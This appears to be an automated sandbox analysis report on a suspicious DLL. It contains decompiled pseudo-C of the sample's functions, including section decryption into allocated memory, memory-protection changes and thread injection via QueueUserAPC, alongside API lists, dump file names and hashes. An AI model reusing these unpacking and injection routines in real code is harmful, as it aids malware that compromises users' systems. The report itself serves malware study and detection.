				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6d4a4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6d4a418c;
						if( *0x6d4a418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6d4a4198;
								if( *0x6d4a4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6d4a418c);
						}
						HeapDestroy( *0x6d4a4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6d4a4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6d4a4190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6d4a41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6D4A1CA4(E6D4A1D32, E6D4A1EE0(_a12, 1, 0x6d4a4198, _t41));
							 *0x6d4a418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6d4a1e07
0x6d4a1e13
0x6d4a1e15
0x6d4a1e18
0x6d4a1e8e
0x6d4a1e94
0x6d4a1e96
0x6d4a1e98
0x6d4a1e9e
0x6d4a1ea0
0x6d4a1ea5
0x6d4a1ea8
0x6d4a1eb3
0x6d4a1eb5
0x00000000
0x00000000
0x6d4a1eb7
0x6d4a1eba
0x6d4a1ebc
0x00000000
0x00000000
0x00000000
0x6d4a1ebc
0x6d4a1ec4
0x6d4a1ec4
0x6d4a1ed0
0x6d4a1ed0
0x6d4a1e1a
0x6d4a1e1b
0x6d4a1e3b
0x6d4a1e41
0x6d4a1e43
0x6d4a1e48
0x6d4a1e84
0x6d4a1e84
0x6d4a1e4a
0x6d4a1e52
0x6d4a1e59
0x6d4a1e63
0x6d4a1e6f
0x6d4a1e76
0x6d4a1e7b
0x6d4a1e80
0x00000000
0x6d4a1e80
0x6d4a1e7b
0x6d4a1e48
0x6d4a1e1b
0x6d4a1edd

APIs

InterlockedIncrement.KERNEL32(6D4A4188), ref: 6D4A1E26
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6D4A1E3B

Part of subcall function 6D4A1CA4: CreateThread.KERNELBASE(00000000,00000000,00000000,?,6D4A4198,6D4A1E74), ref: 6D4A1CBB
Part of subcall function 6D4A1CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6D4A1CD0
Part of subcall function 6D4A1CA4: GetLastError.KERNEL32(00000000), ref: 6D4A1CDB
Part of subcall function 6D4A1CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6D4A1CE5
Part of subcall function 6D4A1CA4: CloseHandle.KERNEL32(00000000), ref: 6D4A1CEC
Part of subcall function 6D4A1CA4: SetLastError.KERNEL32(00000000), ref: 6D4A1CF5

InterlockedDecrement.KERNEL32(6D4A4188), ref: 6D4A1E8E
SleepEx.KERNEL32(00000064,00000001), ref: 6D4A1EA8
CloseHandle.KERNEL32 ref: 6D4A1EC4
HeapDestroy.KERNEL32 ref: 6D4A1ED0

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: b807249ac8d5dfbec2245d6d261a505edf67baabb1ecbec8a8c846521027315a
Instruction ID: e7f69e1f5132094f09fb601132520bc3d8d714e344b9a313a0fdefc5fdf593ba
Opcode Fuzzy Hash: b807249ac8d5dfbec2245d6d261a505edf67baabb1ecbec8a8c846521027315a
Instruction Fuzzy Hash: 5D213371A04205EBCB00AFD98898F5F7FB8F76A2A171D4129E51DD224DE730CD018B50

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A1CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6D4A1CA4(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6d4a41cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6d4a1cbb
0x6d4a1cc1
0x6d4a1cc5
0x6d4a1cd0
0x6d4a1cd8
0x6d4a1ce1
0x6d4a1ce5
0x6d4a1cec
0x6d4a1cf3
0x6d4a1cf5
0x6d4a1cfb
0x6d4a1cd8
0x6d4a1cff

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,6D4A4198,6D4A1E74), ref: 6D4A1CBB
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6D4A1CD0
GetLastError.KERNEL32(00000000), ref: 6D4A1CDB
TerminateThread.KERNEL32(00000000,00000000), ref: 6D4A1CE5
CloseHandle.KERNEL32(00000000), ref: 6D4A1CEC
SetLastError.KERNEL32(00000000), ref: 6D4A1CF5

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 08e8ecbc5c9f9448cef56b40df0ccca0020ccca54679fb0e45e8f4c0876c1dba
Instruction ID: 4ff048c4c4ff9ab062b703a9d172c1f06f51ad72e54b6ae3e548f8238a5ab1c8
Opcode Fuzzy Hash: 08e8ecbc5c9f9448cef56b40df0ccca0020ccca54679fb0e45e8f4c0876c1dba
Instruction Fuzzy Hash: 61F0F836209632BBDB127BE08C1CF5FBE79FB0A755F094404FA099115CEB21CC119BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DB9D1, Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6D4DBA0E
dllmain_crt_dispatch.LIBCMT ref: 6D4DBA25
dllmain_raw.LIBCMT ref: 6D4DBA6D
dllmain_crt_dispatch.LIBCMT ref: 6D4DBA80
dllmain_raw.LIBCMT ref: 6D4DBA93

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 6f2f5998ca6564cf7fdaa765ff7dcbb046bd2065d2ceafd773fd41370acc6677
Instruction ID: db0f3f3ef5772fe3921961364e234be5df0354b2bc8db68b6e23fb630a31b760
Opcode Fuzzy Hash: 6f2f5998ca6564cf7fdaa765ff7dcbb046bd2065d2ceafd773fd41370acc6677
Instruction Fuzzy Hash: 59217A72D0866AAFCBA28E55CC60E7F3A79EF85A94F124159F91867310D7308D028BE0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A15A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E6D4A15A3(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6d4a41b0;
				_t39 = E6D4A1A4B(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6d4a41cc;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6d4a5137; // 0x6d4a5137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6D4A1D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6d4a41cc = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x6d4a15aa
0x6d4a15ba
0x6d4a15c1
0x6d4a15c4
0x6d4a15d9
0x6d4a15e0
0x6d4a15e5
0x6d4a15f6
0x6d4a15f9
0x6d4a1601
0x6d4a1604
0x6d4a16ae
0x6d4a160a
0x6d4a160a
0x6d4a160e
0x6d4a1676
0x6d4a1610
0x6d4a1610
0x6d4a1613
0x6d4a1615
0x6d4a161d
0x6d4a1620
0x6d4a1623
0x6d4a162b
0x6d4a1633
0x6d4a1634
0x6d4a1635
0x6d4a163c
0x6d4a163c
0x6d4a1650
0x6d4a1655
0x6d4a165e
0x6d4a1665
0x6d4a1668
0x6d4a166c
0x6d4a1671
0x00000000
0x00000000
0x6d4a1628
0x6d4a1628
0x6d4a1673
0x6d4a1680
0x6d4a1695
0x6d4a1682
0x6d4a168b
0x6d4a1690
0x6d4a16a6
0x6d4a16a6
0x6d4a16b5
0x6d4a16bb

APIs

VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6D4A15F9
memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6D4A17EC), ref: 6D4A168B
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6D4A16A6

Strings

Mar 26 2021, xrefs: 6D4A162B

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 26 2021
API String ID: 4010158826-2175073649
Opcode ID: ea719120d53263ce38ba5fc4c0ff494bdf5bba9d1703ac7efcb9f1548d4ee987
Instruction ID: 63efbca9c365b227f322a1f0a47681d9c0e7ffd7ab7a5bab578441708fd27c00
Opcode Fuzzy Hash: ea719120d53263ce38ba5fc4c0ff494bdf5bba9d1703ac7efcb9f1548d4ee987
Instruction Fuzzy Hash: F4313271E4021AABDB01DF99C981FEEBBB5BF59304F1C8169D504EB248D771AE068F90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A1D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E6D4A1D32(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6D4A17A7(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6d4a1d3b
0x6d4a1d40
0x6d4a1d4e
0x6d4a1d53
0x6d4a1d53
0x6d4a1d59
0x6d4a1d5e
0x6d4a1d62
0x6d4a1d66
0x6d4a1d66
0x6d4a1d70
0x6d4a1d79

APIs

GetCurrentThread.KERNEL32 ref: 6D4A1D35
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6D4A1D40
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6D4A1D53
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6D4A1D66

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 65f589a38b0a92cbbde2b1eb2617f6f51314af480f0fe6310a5ea52b556466f5
Instruction ID: b4e397f257ebe4b440c0b328461c1d6446bc671e72e7577eff6bd8bc1610c7bb
Opcode Fuzzy Hash: 65f589a38b0a92cbbde2b1eb2617f6f51314af480f0fe6310a5ea52b556466f5
Instruction Fuzzy Hash: 30E022303093212BE7022A684C8CF6F7B6CDFA733171A0335F624D22DCEB508C0585A1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D7CE0, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(000000FF,?,0000416C,00000040,?), ref: 6D4D7E3D

Strings

/, xrefs: 6D4D7CE7
@, xrefs: 6D4D7CF7

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: ProtectVirtual
String ID: /$@
API String ID: 544645111-1264875769
Opcode ID: b4c3e638d1386b3da702d118239c8aa9e192c6ab131dfeec69b8bb4a767a6358
Instruction ID: be545fa034a88deb6dde85f956f91dd353d6ab13f640aafc6f9336b99b9925ae
Opcode Fuzzy Hash: b4c3e638d1386b3da702d118239c8aa9e192c6ab131dfeec69b8bb4a767a6358
Instruction Fuzzy Hash: 0EA18B79904154DFDF08CF69C570BA8BBB1BB86302F0EC16EE88587A99E7345A84DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DB81A, Relevance: 4.6, APIs: 3, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6D4DB867

Part of subcall function 6D4DC084: RtlInitializeSListHead.NTDLL(6D51A9E0), ref: 6D4DC089

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D4DB8D1
___scrt_fastfail.LIBCMT ref: 6D4DB91B

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 2097537958-0
Opcode ID: 2a0d6fbdc72065d054ee6f895387a690ab9989899cec32a675fa35a34e260e30
Instruction ID: 75dadfaac4119e30d6773af1a4495721f51c7a59a16c647c2f7124e5e21e4ed3
Opcode Fuzzy Hash: 2a0d6fbdc72065d054ee6f895387a690ab9989899cec32a675fa35a34e260e30
Instruction Fuzzy Hash: 0B21C032649246AEEF81EFF4D831FAD77709F4636DF22405DEA9067282CB220C469695

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A1030, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E6D4A1030(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6d4a41cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x6d4a103a
0x6d4a1047
0x6d4a104d
0x6d4a1059
0x6d4a1069
0x6d4a106b
0x6d4a1073
0x6d4a1108
0x6d4a110f
0x00000000
0x00000000
0x00000000
0x6d4a1079
0x6d4a1079
0x6d4a1079
0x6d4a107d
0x00000000
0x00000000
0x6d4a1089
0x6d4a108d
0x6d4a10b1
0x6d4a10b5
0x6d4a10c9
0x6d4a10c9
0x6d4a10cf
0x6d4a10de
0x6d4a10e2
0x6d4a10ea
0x6d4a10ea
0x6d4a10f2
0x6d4a10f5
0x6d4a1102
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4a1102
0x6d4a10bd
0x6d4a10c1
0x6d4a10c7
0x00000000
0x00000000
0x00000000
0x6d4a10c7
0x6d4a1095
0x6d4a1099
0x6d4a10a3
0x6d4a109b
0x6d4a109b
0x6d4a109b
0x00000000
0x6d4a1099
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6D4A1069
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6D4A10DE
GetLastError.KERNEL32 ref: 6D4A10E4

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: d0083631a32009fc7358878a54492d5ad2203e5ba6b0195d3ca0cac2b9aa0112
Instruction ID: c37c63f4337ad1d3f84ad6a4d335cd7531796d91139cfffd7b7142314dcd25cd
Opcode Fuzzy Hash: d0083631a32009fc7358878a54492d5ad2203e5ba6b0195d3ca0cac2b9aa0112
Instruction Fuzzy Hash: 0A21A031805217DFCB00CFA5C881EAAF7F9FF18349F04885AD00697949E378AA99CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E1B1A, Relevance: 4.6, APIs: 3, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6D4E1B23
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D4E1B91

Part of subcall function 6D4E1A36: WideCharToMultiByte.KERNEL32(?,00000000,6D4E27CC,00000000,00000001,?,_HNm,?,6D4E27CC,?,00000000,?,6D4E45CE,0000FDE9,00000000,?), ref: 6D4E1AD8

Part of subcall function 6D4E05CE: RtlAllocateHeap.NTDLL(00000000,00000001,6D509094), ref: 6D4E0600

_free.LIBCMT ref: 6D4E1B82

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 88744beaaf519aaa5da6f6f31e07a2652defb998fb737d382f5cc5a68651e055
Instruction ID: aee5627be662f5473baaa17ca17cc265b37689ae6e1aaafa151b58596f1321dc
Opcode Fuzzy Hash: 88744beaaf519aaa5da6f6f31e07a2652defb998fb737d382f5cc5a68651e055
Instruction Fuzzy Hash: 4C0184A2A456123F6B2157BB5C88D7B696DDEC6EE6321012CFA24D7200FB61CD0286F1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A16EC, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E6D4A16EC() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x6d4a41c4);
				_push(1);
				_push( *0x6d4a41d0 + 0x6d4a5089);
				 *0x6d4a41c0 = 0xc;
				 *0x6d4a41c8 = 0; // executed
				L6D4A14D8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E6D4A1112( &_v44,  &_v28,  *0x6d4a41cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x6d4a41b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E6D4A1979(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x6d4a41b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E6D4A2112(_t40, _t30 + 4);
					}
				}
				_t23 = E6D4A1236(_v44); // executed
				goto L7;
			}

0x6d4a16fe
0x6d4a16ff
0x6d4a1704
0x6d4a170c
0x6d4a170d
0x6d4a1717
0x6d4a171d
0x6d4a1726
0x6d4a172b
0x6d4a1749
0x6d4a179e
0x6d4a179f
0x6d4a17a0
0x6d4a17a0
0x6d4a1751
0x6d4a1757
0x6d4a1765
0x6d4a1769
0x6d4a1770
0x6d4a1778
0x6d4a177c
0x6d4a177e
0x6d4a178d
0x6d4a1780
0x6d4a1786
0x6d4a1786
0x6d4a177e
0x6d4a1795
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6D4A41C4,00000000), ref: 6D4A171D
lstrlenW.KERNEL32(?,?,?), ref: 6D4A1751

Part of subcall function 6D4A1979: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6D4A176E,0000000A,?,?), ref: 6D4A1986
Part of subcall function 6D4A1979: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6D4A199C
Part of subcall function 6D4A1979: _snwprintf.NTDLL ref: 6D4A19C1
Part of subcall function 6D4A1979: CreateFileMappingW.KERNELBASE(000000FF,6D4A41C0,00000004,00000000,?,?), ref: 6D4A19E6
Part of subcall function 6D4A1979: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D4A176E,0000000A,?), ref: 6D4A19FD
Part of subcall function 6D4A1979: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D4A176E,0000000A), ref: 6D4A1A32

ExitThread.KERNEL32 ref: 6D4A17A0

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
String ID:
API String ID: 4209869662-0
Opcode ID: 2f92f87a389717b2e6db262ba9a8e283b4aa7ab8edce38050e8b5dc62d3cc179
Instruction ID: 6655ef967abe487bd668b2dab2345b5e4e122ca4e2ba9f3c6c79bff3f1771aca
Opcode Fuzzy Hash: 2f92f87a389717b2e6db262ba9a8e283b4aa7ab8edce38050e8b5dc62d3cc179
Instruction Fuzzy Hash: 82118E72108202AFDB11EB64C848EAF7BFCFB69754F19091AF108D7148DB30ED058791

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D9650, Relevance: 3.2, APIs: 2, Instructions: 224COMMONLIBRARYCODE

Download Yara Rule

APIs

SetConsoleCP.KERNELBASE(00000000,00000000,00000000), ref: 6D4D9657
FindFirstChangeNotificationA.KERNEL32(6D50A4B0,00000001,00000020), ref: 6D4D9666

Memory Dump Source

Source File: 00000000.00000002.1096778244.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4ae000_loaddll32.jbxd

Similarity

API ID: ChangeConsoleFindFirstNotification
String ID:
API String ID: 95506848-0
Opcode ID: d9e30eca32d7f4661549680755c7fa984c0bf5bad02e1a31077d59e0db688657
Instruction ID: f30df7d13d78ec2563ca646ef0f4df3317cb28b6dc5c2fa88d416a09cd7d136a
Opcode Fuzzy Hash: d9e30eca32d7f4661549680755c7fa984c0bf5bad02e1a31077d59e0db688657
Instruction Fuzzy Hash: 5A918E79A042508FDF04CF39C8B4B967BB1A786201F1EC12ED859C7B49E7399949CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A1C12, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E6D4A1C12(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E6D4A1112( &_v8,  &_v12,  *0x6d4a41cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E6D4A1BCB(_t22, _v8,  *0x6d4a41cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_t15 = E6D4A1566(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x6d4a4190, 0, _v8);
				}
				return _t25;
			}

0x6d4a1c12
0x6d4a1c15
0x6d4a1c16
0x6d4a1c2c
0x6d4a1c35
0x6d4a1c3a
0x6d4a1c53
0x6d4a1c3c
0x6d4a1c4f
0x6d4a1c4f
0x6d4a1c57
0x6d4a1c59
0x6d4a1c61
